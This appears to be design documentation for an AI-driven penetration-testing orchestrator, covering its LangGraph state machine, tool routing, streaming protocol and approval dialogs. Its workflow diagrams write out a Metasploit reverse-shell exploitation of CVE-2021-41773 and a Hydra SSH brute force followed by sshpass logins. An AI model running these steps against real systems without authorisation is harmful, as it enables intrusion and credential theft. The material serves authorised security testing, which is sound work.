The RedAmon Agentic System is an AI-powered penetration testing orchestrator built on LangGraph. It implements the ReAct (Reasoning and Acting) pattern to autonomously conduct security assessments while maintaining human oversight through phase-based approval workflows.
- Architecture Overview
- Core Components
- LangGraph State Machine
- Attack Path Classification
- Tool Execution & MCP Integration
- WebSocket Streaming
- Frontend Integration
- Detailed Workflows
- Multi-Objective Support
- Security & Multi-Tenancy
- EvoGraph — Evolutive Attack Chain Graph
- Prompt Token Optimization
- Error Handling & Resilience
- Configuration Reference
- Running the System
flowchart TB
subgraph Frontend["Frontend (Next.js Webapp)"]
UI[AIAssistantDrawer]
Hook[useAgentWebSocket Hook]
Timeline[AgentTimeline]
Dialogs[Approval/Question Dialogs]
end
subgraph Backend["Backend (FastAPI)"]
WS[WebSocket API]
REST[REST API]
WSM[WebSocketManager]
end
subgraph Orchestrator["Agent Orchestrator"]
LG[LangGraph State Machine]
CP[MemorySaver Checkpointer]
SC[StreamingCallback]
end
subgraph Tools["Tool Layer"]
TE[PhaseAwareToolExecutor]
MCP[MCPToolsManager]
N4J[Neo4jToolManager]
end
subgraph MCPServers["MCP Servers (Docker)"]
NETRECON[Network Recon Server :8000<br/>curl + naabu + kali_shell + execute_code]
NUCLEI[Nuclei Server :8002]
MSF[Metasploit Server :8003]
NMAP[Nmap Server :8004]
end
subgraph Data["Data Layer"]
NEO4J[(Neo4j Graph DB)]
KALI[Kali Sandbox Container]
end
UI --> Hook
Hook <-->|WebSocket JSON| WS
WS --> WSM
WSM --> LG
LG --> CP
LG --> SC
SC -->|Streaming Events| WSM
LG --> TE
TE --> MCP
TE --> N4J
MCP --> NETRECON
MCP --> NUCLEI
MCP --> MSF
MCP --> NMAP
N4J --> NEO4J
MSF --> KALI
NETRECON --> KALI
NUCLEI --> KALI
NMAP --> KALI
| File / Directory | Purpose |
|---|---|
orchestrator.py |
Main LangGraph agent with ReAct pattern |
state.py |
Pydantic models and TypedDict state definitions |
project_settings.py |
Database-driven configuration (fetches from webapp API) |
tools.py |
MCP and Neo4j tool management |
api.py |
REST API endpoints |
websocket_api.py |
WebSocket streaming API |
utils.py |
Utility functions |
prompts/ |
System prompts package (phase-aware, attack-path-specific) |
prompts/base.py |
Core ReAct, analysis, and report prompts |
prompts/classification.py |
Attack path classification prompt |
prompts/cve_exploit_prompts.py |
CVE exploitation workflow & payload guidance |
prompts/brute_force_credential_guess_prompts.py |
Brute force / credential attack workflow |
prompts/post_exploitation.py |
Post-exploitation prompts (statefull, stateless) |
prompts/tool_registry.py |
Single source of truth for tool metadata (names, purposes, args, descriptions) |
orchestrator_helpers/ |
Helper modules extracted from orchestrator |
orchestrator_helpers/config.py |
Session config, checkpointer, thread ID management |
orchestrator_helpers/phase.py |
Attack path classification & phase determination |
orchestrator_helpers/parsing.py |
LLM response parsing (decisions & inline analysis) |
orchestrator_helpers/json_utils.py |
JSON serialization with datetime support |
orchestrator_helpers/chain_graph_writer.py |
EvoGraph persistence — attack chain nodes, bridge relationships, and cross-session queries to Neo4j |
orchestrator_helpers/debug.py |
Graph visualization (Mermaid PNG export) |
classDiagram
class AgentOrchestrator {
+llm: ChatOpenAI
+tool_executor: PhaseAwareToolExecutor
+graph: StateGraph
+_guidance_queue: asyncio.Queue
+initialize()
+invoke(question, user_id, project_id, session_id)
+invoke_with_streaming(question, ..., streaming_callback, guidance_queue)
+resume_after_approval(...)
+resume_after_answer(...)
+resume_after_approval_with_streaming(..., guidance_queue)
+resume_after_answer_with_streaming(..., guidance_queue)
+resume_execution_with_streaming(..., guidance_queue)
}
class PhaseAwareToolExecutor {
+mcp_manager: MCPToolsManager
+graph_tool: Neo4jToolManager
+phase_tools: Dict
+execute(tool_name, tool_args, phase)
+execute_with_progress(tool_name, tool_args, phase, progress_callback)
+get_tools_for_phase(phase)
}
class MCPToolsManager {
+servers: List[MCPServer]
+tools_cache: Dict
+get_tools(max_retries, retry_delay)
+call_tool(tool_name, args)
}
class Neo4jToolManager {
+driver: Neo4jDriver
+llm: ChatOpenAI
+query_graph(question, user_id, project_id)
}
class StreamingCallback {
<<interface>>
+on_thinking(iteration, phase, thought, reasoning)
+on_tool_start(tool_name, tool_args)
+on_tool_output_chunk(tool_name, chunk, is_final)
+on_tool_complete(tool_name, success, output_summary, actionable_findings, recommended_next_steps)
+on_phase_update(current_phase, iteration_count, attack_path_type)
+on_approval_request(approval_request)
+on_question_request(question_request)
+on_response(answer, iteration_count, phase, task_complete)
+on_execution_step(step)
+on_error(error_message, recoverable)
+on_task_complete(message, final_phase, total_iterations)
}
AgentOrchestrator --> PhaseAwareToolExecutor
AgentOrchestrator --> StreamingCallback
PhaseAwareToolExecutor --> MCPToolsManager
PhaseAwareToolExecutor --> Neo4jToolManager
The agent maintains comprehensive state throughout execution:
erDiagram
AgentState {
list messages "Conversation history"
int current_iteration "Current loop iteration"
int max_iterations "Maximum allowed iterations"
string current_phase "informational|exploitation|post_exploitation"
string attack_path_type "cve_exploit|brute_force_credential_guess"
bool task_complete "Whether objective is achieved"
string completion_reason "Why task ended"
bool msf_session_reset_done "Metasploit auto-reset tracking"
list chain_findings_memory "EvoGraph: accumulated findings"
list chain_failures_memory "EvoGraph: accumulated failures"
list chain_decisions_memory "EvoGraph: accumulated decisions"
}
AgentState ||--o{ ExecutionStep : execution_trace
AgentState ||--o{ TodoItem : todo_list
AgentState ||--o{ ConversationObjective : conversation_objectives
AgentState ||--o{ ObjectiveOutcome : objective_history
AgentState ||--o{ PhaseHistoryEntry : phase_history
AgentState ||--o{ QAHistoryEntry : qa_history
AgentState ||--|| TargetInfo : target_info
AgentState ||--o| PhaseTransitionRequest : phase_transition_pending
AgentState ||--o| UserQuestionRequest : pending_question
ExecutionStep {
string step_id "Unique step identifier"
int iteration "Step number"
string phase "Phase during step"
string thought "LLM reasoning"
string reasoning "Why this action"
string tool_name "Tool executed"
dict tool_args "Tool arguments"
string tool_output "Raw tool output"
bool success "Execution success"
string output_analysis "LLM analysis of output"
}
TargetInfo {
string primary_target "Main target IP/domain"
string target_type "ip|hostname|domain|url"
list ports "Discovered ports"
list services "Detected services"
list technologies "Identified technologies"
list vulnerabilities "Found vulnerabilities"
list credentials "Extracted credentials (brute force)"
list sessions "Active Metasploit session IDs"
dict session_details "Rich session metadata per ID"
}
TodoItem {
string description "Task description"
string status "pending|in_progress|completed|blocked"
string priority "high|medium|low"
}
stateDiagram-v2
[*] --> initialize
initialize --> process_approval: Has approval response
initialize --> process_answer: Has question answer
initialize --> think: Normal flow
think --> execute_tool: action=use_tool
think --> await_approval: action=transition_phase (needs approval)
think --> await_question: action=ask_user
think --> generate_response: action=complete OR max_iterations
execute_tool --> think: Output analyzed inline in next think
await_approval --> [*]: Pauses for user input
process_approval --> think: Approved or modified
process_approval --> generate_response: Aborted
await_question --> [*]: Pauses for user input
process_answer --> think: Continue with answer
process_answer --> generate_response: If task complete
generate_response --> [*]
flowchart LR
subgraph Nodes["LangGraph Nodes"]
direction TB
INIT[initialize]
THINK[think]
EXEC[execute_tool]
AWAIT_A[await_approval]
PROC_A[process_approval]
AWAIT_Q[await_question]
PROC_Q[process_answer]
GEN[generate_response]
end
subgraph InitDesc["Initialize Node"]
I1[Setup state for new session]
I2[Detect multi-objective scenarios]
I3[Classify attack path via LLM]
I4[Route approval/answer resumption]
I5[Migrate legacy state]
end
subgraph ThinkDesc["Think Node - Single LLM Call"]
T1[Build system prompt with dynamic tool registry]
T2[If pending tool output: inject output analysis section]
T3[Format execution trace with compact/full formatting]
T4[Get LLM decision JSON with inline output_analysis]
T5[Parse action: use_tool/transition_phase/complete/ask_user]
T6[Process output_analysis: merge target info, detect exploits]
T7[Update todo list]
T8[Pre-exploitation validation: force ask_user if LHOST/LPORT missing]
T9[Failure loop detection: inject warning after 3+ similar failures]
end
subgraph ExecDesc["Execute Tool Node"]
E1[Validate tool for current phase]
E2[Set tenant context]
E3[Auto-reset Metasploit on first use via msf_restart]
E4[Execute via MCP or Neo4j]
E5[Stream progress for long-running MSF commands]
E6[Capture output and errors]
end
subgraph GenDesc["Generate Response Node - LLM Call #2"]
G1[Build final report prompt]
G2[Summarize session findings]
G3[Mark task complete]
end
INIT -.-> InitDesc
THINK -.-> ThinkDesc
EXEC -.-> ExecDesc
GEN -.-> GenDesc
When a new objective is detected, the system uses an LLM-based classifier to determine the attack path type and required phase before execution begins. This drives dynamic tool routing throughout the session.
| Type | Description | Example Objective |
|---|---|---|
cve_exploit |
CVE-based exploitation using known vulnerabilities | "Exploit CVE-2021-41773 on 192.168.1.100" |
brute_force_credential_guess |
Hydra brute force / credential attacks against services | "Try SSH brute force on 192.168.1.100" |
<term>-unclassified |
Fallback for techniques without a specialized workflow | "Try SQL injection on the web app" → sql_injection-unclassified |
flowchart TB
MSG[New user objective arrives] --> CLASSIFY[LLM classifies objective]
CLASSIFY --> RESULT{AttackPathClassification}
RESULT --> CVE[cve_exploit]
RESULT --> BRUTE[brute_force_credential_guess]
RESULT --> UNCLASS["<term>-unclassified"]
CVE --> CVE_TOOLS[CVE Exploit Tools<br/>search → use → info → set → exploit]
CVE --> CVE_PAYLOAD{Payload Mode}
CVE_PAYLOAD --> STATEFULL_CVE[Statefull: Meterpreter/Staged payloads<br/>+ LHOST/LPORT config]
CVE_PAYLOAD --> STATELESS_CVE[Stateless: Command/Exec payloads]
BRUTE --> BRUTE_TOOLS[Brute Force Tools<br/>use auxiliary/scanner → set → run]
BRUTE --> BRUTE_POST[Post-Expl: Shell session<br/>via CreateSession=true]
UNCLASS --> UNCLASS_TOOLS[Generic Tools<br/>Use available tools based on technique]
style CVE fill:#6b6b6b
style BRUTE fill:#4a4a4a
style UNCLASS fill:#8a8a8a
style CLASSIFY fill:#5a5a5a
class AttackPathClassification(BaseModel):
required_phase: Phase # "informational" or "exploitation"
attack_path_type: str # "cve_exploit", "brute_force_credential_guess", or "<term>-unclassified"
secondary_attack_path: Optional[str] # Fallback path if primary fails (e.g., brute_force after CVE fails)
confidence: float # 0.0-1.0 confidence score
reasoning: str # Explanation for the classification
detected_service: Optional[str] # e.g., "ssh", "mysql" (for brute force)The classifier runs with retry logic (exponential backoff, max 3 retries) and falls back to ("cve_exploit", "informational") on failure.
Tool availability is now database-driven via TOOL_PHASE_MAP in project settings. The prompt system uses a Tool Registry (prompts/tool_registry.py) as the single source of truth for all tool metadata. Dynamic prompt builders generate tool tables, argument references, and phase definitions at runtime — only showing tools that are actually allowed in the current phase.
Based on the classified attack path, get_phase_tools() assembles different prompt guidance:
| Phase | CVE Exploit Path | Brute Force Path |
|---|---|---|
| Informational | Dynamic recon tool descriptions (from registry) | Dynamic recon tool descriptions (from registry) |
| Exploitation | CVE_EXPLOIT_TOOLS + payload guidance + no-module fallback (if MSF search failed) |
HYDRA_BRUTE_FORCE_TOOLS + wordlist guidance |
| Post-Exploitation | POST_EXPLOITATION_TOOLS_STATEFULL (unified for Meterpreter and shell sessions) |
POST_EXPLOITATION_TOOLS_STATEFULL (same unified prompt) |
No-Module Fallback: When a search CVE-* command returns no results in Metasploit, the system injects a fallback workflow (NO_MODULE_FALLBACK_STATEFULL or NO_MODULE_FALLBACK_STATELESS) that guides the agent to exploit the CVE using execute_curl, execute_code, kali_shell, or execute_nuclei instead. This saves ~1,100-1,350 tokens when a module IS found.
Before executing Metasploit commands in statefull CVE exploit mode, the system validates session configuration:
flowchart TB
THINK[Think Node decides: use metasploit_console] --> CHECK{Statefull mode +<br/>CVE exploit path?}
CHECK -->|No| EXEC[Execute tool normally]
CHECK -->|Yes| VALIDATE{LHOST/LPORT<br/>configured?}
VALIDATE -->|Yes| EXEC
VALIDATE -->|No| QA_CHECK{Already answered<br/>in qa_history?}
QA_CHECK -->|Yes| EXEC
QA_CHECK -->|No| FORCE_ASK[Force ask_user action<br/>Request LHOST/LPORT from user]
FORCE_ASK --> PAUSE([Pause for user answer])
PAUSE --> THINK
style FORCE_ASK fill:#6b6b6b
style PAUSE fill:#6b6b6b
This prevents exploitation failures by ensuring reverse/bind payload parameters are available before the agent attempts to run Metasploit exploits. Hydra brute force attacks bypass this check since they use execute_hydra (stateless) and establish sessions separately via sshpass or database clients.
During Hydra brute force attacks, the think node's inline output analysis automatically extracts discovered credentials:
flowchart LR
OUTPUT[Tool output from<br/>execute_hydra] --> ANALYSIS[Think node inline analysis<br/>LLM extracts credentials]
ANALYSIS --> FOUND{Credentials found?}
FOUND -->|Yes| MERGE[Merge into TargetInfo.credentials]
FOUND -->|No| SKIP[No update]
MERGE --> TARGET[Updated target_info<br/>available in state]
flowchart TB
subgraph Phases["Security Phases"]
INFO[Informational Phase]
EXPL[Exploitation Phase]
POST[Post-Exploitation Phase]
end
subgraph InfoTools["Informational Tools"]
QG[query_graph<br/>Neo4j queries]
WS[web_search<br/>Tavily web search]
CURL[execute_curl<br/>HTTP requests & vuln probing]
NAABU[execute_naabu<br/>Port scanning]
NMAP_T[execute_nmap<br/>Deep scanning & NSE scripts]
NUCLEI_T[execute_nuclei<br/>CVE verification]
KALI[kali_shell<br/>General Kali shell]
end
subgraph ExplTools["Exploitation Tools"]
MSF[metasploit_console<br/>msfconsole commands]
CODE[execute_code<br/>Code execution, no escaping]
end
subgraph PostTools["Post-Exploitation Tools"]
SESS[msf_session_run<br/>Session commands]
WAIT[msf_wait_for_session<br/>Session polling]
LIST[msf_list_sessions<br/>List active sessions]
end
INFO --> InfoTools
EXPL --> InfoTools
EXPL --> ExplTools
POST --> InfoTools
POST --> ExplTools
POST --> PostTools
style INFO fill:#7a7a7a
style EXPL fill:#6b6b6b
style POST fill:#4a4a4a
sequenceDiagram
participant O as Orchestrator
participant TE as ToolExecutor
participant MCP as MCPToolsManager
participant S as MCP Server
participant K as Kali Container
O->>TE: execute("naabu", {target: "192.168.1.1"}, "informational")
TE->>TE: Validate phase allows tool (via TOOL_PHASE_MAP)
TE->>TE: set_tenant_context(user_id, project_id)
TE->>MCP: call_tool("naabu", args)
MCP->>S: HTTP POST /tools/naabu
S->>K: Execute naabu command
K-->>S: Port scan results
S-->>MCP: JSON response
MCP-->>TE: Formatted output
TE-->>O: {success: true, output: "..."}
The MCPToolsManager.get_tools() method includes retry logic with exponential backoff to handle MCP server startup races:
Attempt 1 → fail → wait 10s → Attempt 2 → fail → wait 20s → ... → Attempt 5 → fail → continue without MCP tools
This prevents the agent from crash-looping when the Kali sandbox container takes longer to start than the agent.
sequenceDiagram
participant O as Orchestrator
participant N4J as Neo4jToolManager
participant LLM as OpenAI LLM
participant DB as Neo4j Database
O->>N4J: query_graph("What ports are open on 192.168.1.1?")
N4J->>LLM: Generate Cypher from question
LLM-->>N4J: MATCH (i:IP {address: '192.168.1.1'})-[:HAS_PORT]->(p:Port) RETURN p
N4J->>N4J: Inject tenant filter (user_id, project_id)
N4J->>DB: Execute Cypher query
alt Query Success
DB-->>N4J: Query results
N4J-->>O: Formatted results
else Query Error
DB-->>N4J: Error message
N4J->>LLM: Retry with error context
LLM-->>N4J: Fixed Cypher query
N4J->>DB: Execute fixed query
DB-->>N4J: Results
N4J-->>O: Formatted results
end
flowchart TB
subgraph MSFServer["Metasploit MCP Server"]
PROC[Persistent msfconsole Process]
READER[Background Output Reader Thread]
QUEUE[Output Queue Buffer]
end
subgraph Commands["One Command Per Call"]
C1["search CVE-2021-41773"]
C2["use exploit/multi/http/..."]
C3["info"]
C4["show targets"]
C5["set TARGET 0"]
C6["show payloads"]
C7["set PAYLOAD cmd/unix/reverse_bash"]
C8["set RHOSTS 192.168.1.100"]
C9["exploit"]
C10["msf_wait_for_session()"]
end
C1 --> PROC
C2 --> PROC
C3 --> PROC
C4 --> PROC
C5 --> PROC
C6 --> PROC
C7 --> PROC
C8 --> PROC
C9 --> PROC
PROC --> READER
READER --> QUEUE
QUEUE --> |Timing-based detection| OUTPUT[Clean Output]
C10 --> |Separate MCP tool| POLL[Poll for sessions]
POLL --> |sessions -l| PROC
style PROC fill:#4a4a4a
style C10 fill:#6b6b6b
flowchart LR
subgraph Client["Client → Server"]
INIT[init<br/>{user_id, project_id, session_id}]
QUERY[query<br/>{question}]
APPROVAL[approval<br/>{decision, modification}]
ANSWER[answer<br/>{answer}]
GUIDANCE[guidance<br/>{message}]
STOP[stop<br/>{}]
RESUME[resume<br/>{}]
PING[ping<br/>{}]
end
subgraph Server["Server → Client"]
CONNECTED[connected]
THINKING[thinking<br/>{iteration, phase, thought, reasoning}]
TOOL_START[tool_start<br/>{tool_name, tool_args}]
TOOL_CHUNK[tool_output_chunk<br/>{tool_name, chunk, is_final}]
TOOL_COMPLETE[tool_complete<br/>{tool_name, success, output_summary,<br/>actionable_findings, recommended_next_steps}]
PHASE_UPDATE[phase_update<br/>{current_phase, iteration_count, attack_path_type}]
TODO_UPDATE[todo_update<br/>{todo_list}]
APPROVAL_REQ[approval_request<br/>{from_phase, to_phase, reason, risks}]
QUESTION_REQ[question_request<br/>{question, context, format, options}]
RESPONSE[response<br/>{answer, task_complete}]
EXEC_STEP[execution_step<br/>{step summary}]
TASK_DONE[task_complete<br/>{message, final_phase}]
GUIDANCE_ACK[guidance_ack<br/>{message, queue_position}]
STOPPED[stopped<br/>{message, iteration, phase}]
ERROR[error<br/>{message, recoverable}]
end
The think node emits events in a specific order to maintain correct timeline rendering in the frontend. When the think node processes both a completed previous step and a new decision, events are emitted as: tool_complete (previous) -> thinking (new) -> tool_start (new).
sequenceDiagram
participant C as Client (Browser)
participant WS as WebSocket API
participant O as Orchestrator
participant CB as StreamingCallback
C->>WS: init {user_id, project_id, session_id}
WS-->>C: connected
C->>WS: query {question: "Scan ports on 192.168.1.1"}
WS->>O: invoke_with_streaming(question, callback)
Note over O,CB: First iteration (no pending output)
O->>CB: on_phase_update("informational", 1, "cve_exploit")
CB-->>WS-->>C: phase_update
O->>CB: on_thinking(1, "informational", "Need to scan...", "Port scan required")
CB-->>WS-->>C: thinking
O->>CB: on_tool_start("naabu", {target: "192.168.1.1"})
CB-->>WS-->>C: tool_start
Note over O: Tool executes...
O->>CB: on_tool_output_chunk("naabu", "22/tcp open\n80/tcp open", true)
CB-->>WS-->>C: tool_output_chunk
Note over O,CB: Second iteration (pending output from naabu)
O->>CB: on_tool_complete("naabu", true, "Found 2 open ports")
CB-->>WS-->>C: tool_complete (previous step)
O->>CB: on_thinking(2, "informational", "Found open ports...", "Query graph next")
CB-->>WS-->>C: thinking (new decision)
O->>CB: on_tool_start("query_graph", {question: "..."})
CB-->>WS-->>C: tool_start (new tool)
O->>CB: on_todo_update([{description: "Analyze services", status: "pending"}])
CB-->>WS-->>C: todo_update
Note over O: ... continues until complete ...
O->>CB: on_response("Scan complete. Found ports 22, 80.", 3, "informational", true)
CB-->>WS-->>C: response
O->>CB: on_task_complete("Task completed", "informational", 3)
CB-->>WS-->>C: task_complete
Users can send guidance messages while the agent is working (thinking or executing tools). These messages steer/correct the agent's current objective without creating new tasks.
sequenceDiagram
participant U as User (Frontend)
participant WS as WebSocket API
participant Q as Connection.guidance_queue
participant O as Orchestrator (_think_node)
Note over O: Agent is working (think → execute → think loop)
U->>WS: guidance {message: "Focus on port 22"}
WS->>Q: guidance_queue.put("Focus on port 22")
WS-->>U: guidance_ack {message, queue_position: 1}
U->>WS: guidance {message: "Skip the web server"}
WS->>Q: guidance_queue.put("Skip the web server")
WS-->>U: guidance_ack {message, queue_position: 2}
Note over O: Next think node runs...
O->>Q: drain_guidance() → ["Focus on port 22", "Skip the web server"]
O->>O: Inject into system prompt as<br/>## USER GUIDANCE (IMPORTANT)
O->>O: LLM acknowledges guidance in thought
How it works:
- Frontend: When
isLoading=true, the chat input stays enabled. Sending a message routes tosendGuidance()instead ofsendQuery(). - WebSocket API:
handle_guidanceputs the message into the connection'sasyncio.Queueand sends back aguidance_ackwith the queue position. - Orchestrator: At the start of each
_think_nodeinvocation, pending guidance messages are drained from the queue and injected into the system prompt as a numbered## USER GUIDANCEsection. - LLM: The agent sees the guidance and adjusts its plan accordingly in the next decision.
Edge cases:
- Multiple guidance messages before the next think step are all collected and injected as a numbered list
- Guidance sent during tool execution is queued and consumed in the next think step
- Stale guidance from previous queries is drained at the start of each new
handle_query
Users can stop the agent mid-execution and resume from the last LangGraph checkpoint.
sequenceDiagram
participant U as User (Frontend)
participant WS as WebSocket API
participant T as asyncio.Task
participant CP as MemorySaver Checkpoint
Note over T: Agent task running (background asyncio.Task)
U->>WS: stop {}
WS->>T: task.cancel()
T->>T: CancelledError raised
Note over CP: State checkpointed at last node boundary
WS->>WS: Read iteration/phase from checkpoint
WS-->>U: stopped {message, iteration: 5, phase: "exploitation"}
Note over U: UI shows resume button (green play icon)
U->>WS: resume {}
WS->>WS: Create new background task
WS->>T: orchestrator.resume_execution_with_streaming()
T->>CP: graph.astream({}, config) — resume from checkpoint
Note over T: Agent continues from last node boundary
T-->>WS-->>U: thinking, tool_start, ... (normal streaming)
How it works:
- Background tasks: All orchestrator invocations (
handle_query,handle_approval,handle_answer) run asasyncio.create_task()background tasks, keeping the WebSocket receive loop free for guidance/stop/resume messages. - Stop: Cancels the active
asyncio.Task. TheCancelledErroris caught gracefully. LangGraph'sMemorySaverhas already checkpointed state at the last node boundary. - Resume: Calls
resume_execution_with_streaming()which re-invokesgraph.astream({}, config)with empty input. The graph resumes from the checkpoint, re-enteringinitialize → thinkwith the preserved state. - Frontend: The stop button (red square) appears during loading. After stop, it becomes a resume button (green play). The input is disabled while stopped.
stateDiagram-v2
[*] --> DISCONNECTED
DISCONNECTED --> CONNECTING: connect()
CONNECTING --> CONNECTED: WebSocket open + init success
CONNECTING --> FAILED: Connection error
CONNECTED --> RECONNECTING: WebSocket close/error
CONNECTED --> DISCONNECTED: disconnect()
RECONNECTING --> CONNECTING: Retry attempt
RECONNECTING --> FAILED: Max retries exceeded
FAILED --> CONNECTING: reconnect()
flowchart TB
subgraph State["AIAssistantDrawer State"]
ITEMS[chatItems: Array]
PHASE[currentPhase: string]
LOADING[isLoading: boolean]
STOPPED[isStopped: boolean]
AWAIT_A[awaitingApproval: boolean]
AWAIT_Q[awaitingQuestion: boolean]
TODO[todoList: Array]
end
subgraph Events["WebSocket Events"]
E_THINK[thinking]
E_TOOL[tool_start/complete]
E_PHASE[phase_update]
E_TODO[todo_update]
E_APPR[approval_request]
E_QUES[question_request]
E_RESP[response]
E_GACK[guidance_ack]
E_STOP[stopped]
end
subgraph UI["UI Components"]
TIMELINE[AgentTimeline]
DIALOG_A[ApprovalDialog]
DIALOG_Q[QuestionDialog]
TODO_W[TodoListWidget]
CHAT[ChatMessages]
STOP_BTN[Stop/Resume Button]
GUIDANCE_INPUT[Guidance Input<br/>enabled during loading]
end
E_THINK --> |Add ThinkingItem| ITEMS
E_TOOL --> |Add ToolExecutionItem| ITEMS
E_RESP --> |Add MessageItem| ITEMS
E_PHASE --> PHASE
E_TODO --> TODO
E_APPR --> AWAIT_A
E_QUES --> AWAIT_Q
E_STOP --> STOPPED
ITEMS --> TIMELINE
ITEMS --> CHAT
AWAIT_A --> DIALOG_A
AWAIT_Q --> DIALOG_Q
TODO --> TODO_W
PHASE --> |Phase badge styling| TIMELINE
LOADING --> STOP_BTN
STOPPED --> STOP_BTN
LOADING --> GUIDANCE_INPUT
The chat input adapts based on agent state:
| State | Input Enabled | Send Action | Placeholder | Extra Button |
|---|---|---|---|---|
| Idle | Yes | sendQuery() |
"Ask a question..." | None |
| Loading (agent working) | Yes | sendGuidance() |
"Send guidance to the agent..." | Stop (red square) |
| Stopped | No | — | "Agent stopped. Click resume..." | Resume (green play) |
| Awaiting approval | No | — | "Respond to the approval request..." | None |
| Awaiting question | No | — | "Answer the question above..." | None |
| Disconnected | No | — | "Connecting to agent..." | None |
Guidance messages appear in the chat with a purple "Guidance" badge and dashed border styling to distinguish them from regular user messages.
flowchart TB
START([User sends question]) --> INIT[Initialize Node]
INIT --> CHECK_RESUME{Resuming after<br/>approval/answer?}
CHECK_RESUME -->|Yes, approval| PROC_A[Process Approval]
CHECK_RESUME -->|Yes, answer| PROC_Q[Process Answer]
CHECK_RESUME -->|No| NEW_OBJ{New objective?}
NEW_OBJ -->|Yes| CLASSIFY[LLM classifies attack path<br/>+ required phase]
NEW_OBJ -->|No| THINK[Think Node]
CLASSIFY --> THINK
PROC_A --> THINK
PROC_Q --> THINK
THINK --> PRE_VALID{Pre-exploitation<br/>validation}
PRE_VALID -->|Missing LHOST/LPORT| FORCE_ASK[Force ask_user]
PRE_VALID -->|OK| DECISION{Action?}
FORCE_ASK --> AWAIT_Q
DECISION -->|use_tool| EXEC[Execute Tool]
DECISION -->|transition_phase| PHASE_CHECK{Needs approval?}
DECISION -->|ask_user| AWAIT_Q[Await Question]
DECISION -->|complete| GEN[Generate Response]
EXEC --> THINK_AGAIN[Think Node<br/>analyzes output inline + decides next]
THINK_AGAIN --> ITER_CHECK{Max iterations?}
ITER_CHECK -->|No| PRE_VALID
ITER_CHECK -->|Yes| GEN
PHASE_CHECK -->|Yes| AWAIT_A[Await Approval]
PHASE_CHECK -->|No, auto-approve| UPDATE_PHASE[Update Phase]
UPDATE_PHASE --> THINK
AWAIT_A --> PAUSE_A([Pause - Wait for user])
PAUSE_A --> |User responds| PROC_A
AWAIT_Q --> PAUSE_Q([Pause - Wait for user])
PAUSE_Q --> |User answers| PROC_Q
GEN --> END([Return response])
style START fill:#7a7a7a
style END fill:#7a7a7a
style PAUSE_A fill:#6b6b6b
style PAUSE_Q fill:#6b6b6b
style CLASSIFY fill:#636363
style THINK fill:#5a5a5a
style THINK_AGAIN fill:#5a5a5a
style GEN fill:#5a5a5a
sequenceDiagram
participant A as Agent (Think Node)
participant O as Orchestrator
participant WS as WebSocket
participant U as User (Frontend)
A->>O: Decision: transition_phase to "exploitation"
O->>O: Check REQUIRE_APPROVAL_FOR_EXPLOITATION
alt Approval Required
O->>O: Store phase_transition_pending
O->>O: Set awaiting_user_approval = true
O->>WS: Send approval_request message
WS->>U: Display approval dialog
Note over O,U: Graph pauses at await_approval node (END)
U->>WS: User decision (approve/modify/abort)
WS->>O: Resume with user_approval_response
alt User Approved
O->>O: Update current_phase = "exploitation"
O->>O: Add to phase_history
O->>O: Clear approval state
O->>A: Continue in new phase
else User Modified
O->>O: Add modification to messages
O->>O: Clear approval state
O->>A: Continue with modification context
else User Aborted
O->>O: Set task_complete = true
O->>O: Generate final response
end
else Auto-Approve (downgrade to informational)
O->>O: Update current_phase immediately
O->>A: Continue in new phase
end
sequenceDiagram
participant U as User
participant A as Agent
participant MSF as Metasploit Server
participant T as Target
U->>A: "Exploit CVE-2021-41773 on 192.168.1.100"
Note over A: Initialize: LLM classifies → cve_exploit
Note over A: Phase: Informational
A->>A: Query graph for target info
A->>A: Request phase transition to exploitation
U->>A: Approve transition
Note over A: Phase: Exploitation (cve_exploit path)
Note over A: Pre-exploitation: validate LHOST/LPORT
A->>MSF: search CVE-2021-41773
MSF-->>A: exploit/multi/http/apache_normalize_path_rce
A->>MSF: use exploit/multi/http/apache_normalize_path_rce
MSF-->>A: Module loaded
A->>MSF: info
MSF-->>A: Module options and description
A->>MSF: show targets
MSF-->>A: 0: Unix Command, 1: Linux Dropper
A->>MSF: set TARGET 0
MSF-->>A: TARGET => 0
A->>MSF: show payloads
MSF-->>A: Compatible payloads list
A->>MSF: set PAYLOAD cmd/unix/reverse_bash
MSF-->>A: PAYLOAD => cmd/unix/reverse_bash
A->>MSF: set RHOSTS 192.168.1.100
MSF-->>A: RHOSTS => 192.168.1.100
A->>MSF: set LHOST 192.168.1.50
MSF-->>A: LHOST => 192.168.1.50
A->>MSF: exploit
MSF->>T: Send exploit payload
T-->>MSF: Reverse shell connects
MSF-->>A: "Sending stage..." (streamed via progress chunks)
Note over A: Session detected via inline output analysis
A->>MSF: msf_wait_for_session(timeout=120)
MSF-->>A: Session 1 opened
A->>A: Request phase transition to post_exploitation
U->>A: Approve transition
Note over A: Phase: Post-Exploitation (Meterpreter)
A->>MSF: msf_session_run(1, "whoami")
MSF->>T: Execute command in session
T-->>MSF: "www-data"
MSF-->>A: Command output
sequenceDiagram
participant U as User
participant A as Agent
participant H as Hydra (execute_hydra)
participant K as Kali Shell
participant T as Target
U->>A: "Try SSH brute force on 192.168.1.100"
Note over A: Initialize: LLM classifies → brute_force_credential_guess
Note over A: Phase: Informational
A->>A: Query graph for target info (ports, services)
A->>A: Request phase transition to exploitation
U->>A: Approve transition
Note over A: Phase: Exploitation (brute_force path)
Note over A: No LHOST/LPORT needed (Hydra is stateless)
A->>H: -l ubuntu -P unix_passwords.txt -t 4 -f -e nsr -V ssh://192.168.1.100
H->>T: Try credentials (parallel, 4 threads)
T-->>H: [22][ssh] host: 192.168.1.100 login: admin password: password123
H-->>A: 1 valid password found
Note over A: Credentials detected via inline output analysis
A->>K: sshpass -p 'password123' ssh admin@192.168.1.100 'whoami && id'
K->>T: SSH login with discovered credentials
T-->>K: "admin" + uid info
K-->>A: SSH access confirmed
A->>A: Request phase transition to post_exploitation
U->>A: Approve transition
Note over A: Phase: Post-Exploitation (Shell via sshpass)
A->>K: sshpass -p 'password123' ssh admin@192.168.1.100 'uname -a'
K->>T: Execute command via SSH
T-->>K: "Linux target 5.15.0..."
MSF-->>A: Command output
sequenceDiagram
participant A as Agent (Think Node)
participant O as Orchestrator
participant WS as WebSocket
participant U as User (Frontend)
A->>O: Decision: ask_user with question
O->>O: Store pending_question
O->>O: Set awaiting_user_question = true
O->>WS: Send question_request message
WS->>U: Display question dialog
Note over U: Dialog shows question, context, format<br/>(text/single_choice/multi_choice)
Note over O,U: Graph pauses at await_question node (END)
U->>WS: User provides answer
WS->>O: Resume with user_question_answer
O->>O: Create QAHistoryEntry
O->>O: Add to qa_history
O->>O: Clear question state
O->>O: Add answer to messages context
O->>A: Continue with answer in context
